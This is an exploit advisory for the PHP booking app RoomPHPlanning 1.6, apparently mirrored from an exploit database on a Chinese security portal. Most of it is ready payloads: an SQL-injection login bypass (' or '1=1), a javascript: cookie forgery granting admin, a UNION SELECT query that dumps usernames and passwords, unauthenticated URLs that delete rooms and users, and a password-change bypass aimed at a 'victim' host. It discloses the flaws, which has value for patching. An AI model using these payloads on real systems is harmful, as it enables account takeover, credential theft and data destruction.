首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RoomPHPlanning 1.6 Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
                                    o       o       o  O     O
 ooooooo 0     oooo          OOOo  o       o       o  O O   O
    0    0     0             o  o  o       o       o  O  O  O
    0    0000  oooo  ooooo   o  o  oooooo  o       o  O   O O
    0    0  0  0     0   0   o  o  O     O o       o  O    OO
    0    0  0  oooo  ooooo   oooo  OOOOOO  oooooo {O} O     O
                         0
                         0 
                         0
                    0    0
                    0oooo0
################################################################################################
[+] RoomPHPlanning v1.6 Multiple Remote Exploit Vulnerabilities
[+] Discovered By : ThE g0bL!N      
[+] Greetz : All my freind      
[+] Note: Tested On localhost :)
[+] Download:http://www.beaussier.com/roomphplanning/telecharge.php
################################################################################################
Auth Bypass
-----------
File: Login.php
-----
 $qry =  "SELECT IdUs, NameUs ".
   "FROM ".USER." ". => Vuln
   "WHERE LoginUs = '".$_GET['loginus']." ' ".
   "AND PwdUs = '".$pwdus." ' "; => Vuln2
Exploit:
--------
username:real_user' or '1=1
password:ThE g0bL!N
###############################################################################################
Cookies Insecure
------------
File:Login.php
----
setcookie($cookie,$idus,time()+3600,"/");=> $cookiename=room_phplanning $idus= user_id
Exploit:
-------
javascript:document.cookie="room_phplanning=[admin_id];path=/";
Then go to Url: /admin/
###############################################################################################
SQL Injection
-------------
After login
admin/userform.php?id=-1+union+select+1,concat(LoginUs,0x3a,PwdUs),3+FROM+rp_user+where%20IdUs=1--
###############################################################################################
Delete Rooms (out Of cookies)
------------
http://localhost/rp_1.6/rp_1.6/admin/delitem.php?room=$room id
Example:
-------
http://localhost/rp_1.6/rp_1.6/admin/delitem.php?room=1
Delete Users(out Of cookies)
------------:
http://localhost/rp_1.6/rp_1.6/admin/delitem.php?user=user id
Example:
-------
http://localhost/rp_1.6/rp_1.6/admin/delitem.php?user=5
###############################################################################################
Remote Change Password Bypassing:
--------------------------------
Go to url:
----------
http://victim.co.il/changepwd.php
Old Password :admin_name' or '1=1
New Password New pass
Write twice: Retype Your New pass
Then Enter With New pass :)
###############################################################################################
Greeting ;His0k4 - Dr-HTmL - M0nSt3r-Dz Dz_V!RuS( win rak :( ) ViRuS_HaCkErS_Dz ( Djelloul Al meshakaf ) (:
###############################################################################################

# [2009-05-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gallarific (user.php) Arbirary
·Safari RSS feed:// Buffer Over
·Ultimate Media Script 2.0 Remo
·PHP <= 5.2.9 Local Safemod Byp
·Mozilla Firefox (unclamped loo
·Flax Article Manager 1.1 (Cook
·eZoneScripts Hotornot2 Script
·Joomla Component com_rsgallery
·Webradev Download Protect 1.0
·Kensei Board <= 2.0.0b Multipl
·Wordpress Plugin Lytebox (wp-l
·MyForum 1.3 (Auth Bypass) Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved